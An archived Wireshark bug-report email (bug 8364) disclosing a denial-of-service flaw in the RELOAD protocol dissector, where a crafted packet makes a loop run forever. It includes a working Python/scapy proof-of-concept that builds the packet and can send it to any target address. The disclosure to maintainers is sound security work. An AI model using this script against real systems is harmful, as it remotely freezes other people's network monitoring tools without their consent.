Huge thanks to our Platinum Members Endace and LiveAction,
and our Silver Member Veeam, for supporting the Wireshark Foundation and project.
Wireshark logo

Wireshark-bugs: [Wireshark-bugs] [Bug 8364] New: Denial of Service in packet-reload.c

Date Prev · Date Next · Thread Prev · Thread Next
Date Index · Thread Index · Other Months · All Mailing Lists
From: bugzilla-daemon@xxxxxxxxxxxxx
Date: Thu, 21 Feb 2013 01:07:16 +0000
Bug ID 8364
Summary Denial of Service in packet-reload.c
Classification Unclassified
Product Wireshark
Version 1.8.5
Hardware All
OS All
Status UNCONFIRMED
Severity Major
Priority Low
Component Dissection engine (libwireshark)
Assignee [email protected]
Reporter [email protected] 

Created attachment 10062 [details]
Pcap that will hang wireshark

Build Information:

--
A maliciously crafted packet can cause a denial of service condition by
triggering a bug in packet-reload.c on line 3008. The bug is in the while loop
condition. It can be made to always evaluate to true. The while loop takes the
form of
 while(guint16<guint32){/*...*/} 
where both integers are taken from the packet. A specially crafted packet can
force Wireshark to hang indefinitely. The dissector is applied heuristically so
no user interaction is required to trigger the bug. 


Steps to reproduce:
  Use the python/scapy script to generate a packet or open the attached pcap
and try to view in wireshark or tshark.
Expected Results
  pretty pictures of packet internals, business as usual. 
Actual Results:
  Dissector loops forever. Wireshark/tshark becomes unresponsive.


##################################
#Python script to generate packet#
##################################

from scapy.all import *
from struct import pack
import sys

#0_ dissect_diagnosticrequest
#1_ dissect_pathtrackreq
#2_ dissect_reload_messagecontents
#3_ dissect_reload_message
#4_ dissector_try_heuristic

m='This message is brought to you by Evan Jensen AKA wont'
header='d2454c4f'.decode('hex')
switch_at_3438 = pack('>H',101)
message_size=pack('>I',38)
must_be_greater_than_zero = pack('>I',1)
choke_on_this='\x01'*(2**10)
data="" + m[:12] +message_size+m[12:24]+'\x00'*6 + \
    switch_at_3438 + must_be_greater_than_zero + '\x00'*9\
    + 'wont'*5 + choke_on_this


if len(sys.argv)<2:
    packet=Ether()/IP(dst="127.0.0.1")/TCP(dport=8090,sport=5070)/Raw(data)
    wrpcap('reload.c.crash.pcap',[packet])

elif ':' in sys.argv[1]:
    packet=IPv6(dst=sys.argv[1])/TCP(dport=8090,sport=5070)/Raw(data)
    send(packet)

else:
    packet=IP(dst=sys.argv[1])/TCP(dport=8090,sport=5070)/Raw(data)
    send(packet)

You are receiving this mail because:
  • You are watching all bug changes.
Wireshark logo footer

© Wireshark Foundation · Privacy Policy

Facebook·Mastodon·Twitter·YouTube